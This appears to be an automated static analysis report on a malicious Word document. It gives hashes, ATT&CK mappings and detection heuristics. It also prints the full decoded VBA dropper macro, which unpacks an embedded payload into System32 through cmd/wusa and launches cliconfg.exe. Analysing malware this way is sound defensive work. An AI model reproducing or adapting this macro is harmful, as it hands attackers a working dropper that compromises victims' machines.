Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42a782d342fb7016…

MALICIOUS

Office (OLE)

Size: 330.5 KB
Created: 2018-01-17 19:39:00
Authoring application: Microsoft Office Word
First seen: 2019-10-01
MD5: 9b93066b085a7929aabbab8ccfd331be
SHA-1: 9b7c3c48bcef6330e3086de592b3223eb198744a
SHA-256: 42a782d342fb70169b07a5c2be054af49f88ffa92d04243b070b5b939eaa4465
Risk Score: 490

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro that utilizes WScript.Shell and cmd.exe. This strongly suggests the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The 'Password-protected archive handoff' heuristic indicates the document's content is a lure to obtain a password, a common tactic for malware droppers to evade initial analysis.

Heuristics (13)

  • ClamAV: Doc.Dropper.Agent-6423178-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6423178-0
  • VBA macros detected [medium, 7 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Matched line in script:
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched line in script:
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script:
        Set oWscriptShell = CreateObject("WScript.Shell")
        sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
  • GetObject call [high] (OLE_VBA_GETOBJ)
    Matched line in script:
        proc_query = "SELECT * FROM Win32_Processor"
        Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
        For Each info In proc_results
  • cmd.exe reference in VBA [high] (OLE_VBA_CMD)
    Matched line in script:
            If System.Version >= "6.0" Then
                nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
            Else
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Matched line in script:
    End Function
    Private Sub Document_Open()
        With ActiveDocument.Content
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
  • OLE document has large unaccounted-for region [high] (OLE_SLACK_ANOMALY)
    OLE file is 338,382 bytes but its declared streams total only 93,887 bytes — 244,495 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure). In this sample the extracted macro itself accounts for the region: Document_Open first checks that its own file is exactly 338,382 bytes, then reads 238,542 bytes starting at offset 99,840 (ending exactly at the file size), decodes them with the custom 64-character alphabet in debase64 and writes the result to %TEMP%\setup.cab, which the shell command then expands into %SystemRoot%\System32 before launching cliconfg.exe.
  • Password-protected archive handoff [high] (SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment, often used to keep payloads encrypted until after gateway scanning
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  3638 bytes
SHA-256: e5f69adbd348644e3e79cad8e97e18433b12dda75341a9773be4053e810171a8
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim nResult As Long
Dim sFileName As String
Dim sTempPath As String
Dim sTempFile As String
Dim cbFileBuffer As Long
Private Function debase64(InputFile As String, nOffset As Long, nCount As Long, OutputFile As String) As Long
    Dim strKey As String
    Dim lpInBuffer
    Dim lpOutBuffer() As Byte
    Dim chr1, chr2, chr3, enc1, enc2, enc3, enc4 As Byte
    Dim nIndex, nResult As Long
    
    strKey = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv"
    
    Open InputFile For Binary As #1
        Seek #1, nOffset + 1
        lpInBuffer = Input(nCount, #1)
    Close #1
    
    ReDim lpOutBuffer(nCount) As Byte
    
    nIndex = 1
    nResult = 0
    
    Do While nIndex <= nCount
        enc1 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc2 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc3 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        enc4 = InStr(1, strKey, Mid(lpInBuffer, nIndex, 1), 0) - 1
        nIndex = nIndex + 1
        
        chr1 = (enc1 * 4) Or (enc2 \ 16)
        chr2 = ((enc2 And 15) * 16) Or (enc3 \ 4)
        chr3 = ((enc3 And 3) * 64) Or enc4
        
        lpOutBuffer(nResult) = chr1
        nResult = nResult + 1
        
        If enc3 <> 64 Then
            lpOutBuffer(nResult) = chr2
            nResult = nResult + 1
        End If
        
        If enc4 <> 64 Then
            lpOutBuffer(nResult) = chr3
            nResult = nResult + 1
        End If
    Loop
    
    ReDim Preserve lpOutBuffer(nResult - 1) As Byte
    
    Open OutputFile For Binary As #2
    Put #2, , lpOutBuffer
    Close #2
    
    debase64 = nResult
End Function

Private Function IsWin64() As Boolean
    Dim proc_query As String
    Dim proc_results As Object
    Dim info As Object
    Dim IsWin32OrWin64 As String
    
    proc_query = "SELECT * FROM Win32_Processor"
    Set proc_results = GetObject("Winmgmts:").ExecQuery(proc_query)
    For Each info In proc_results
        IsWin32OrWin64 = "Win" & info.AddressWidth
    Next info
    
    If IsWin32OrWin64 = "Win32" Then
        IsWin64 = False
    Else
        IsWin64 = True
    End If
End Function
Private Sub Document_Open()
    With ActiveDocument.Content
        .Font.ColorIndex = wdBlack
        '.Paragraphs(4).Range.Font.ColorIndex = wdRed
    End With

    Set oWscriptShell = CreateObject("WScript.Shell")
    sTempPath = oWscriptShell.ExpandEnvironmentStrings("%TEMP%")
        
    sFileName = ActiveDocument.FullName
    cbFileBuffer = FileLen(sFileName)
    
    If (cbFileBuffer = 338382) Then
        sTempFile = sTempPath & "\setup.cab"
        
        nResult = InStr(Application.Path, "x86")

    nResult = debase64(sFileName, 99840, 238542, sTempFile)
                
        If System.Version >= "6.0" Then
            nResult = Shell("cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        Else
            nResult = Shell("cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe", 0)
        End If
    End If
End Sub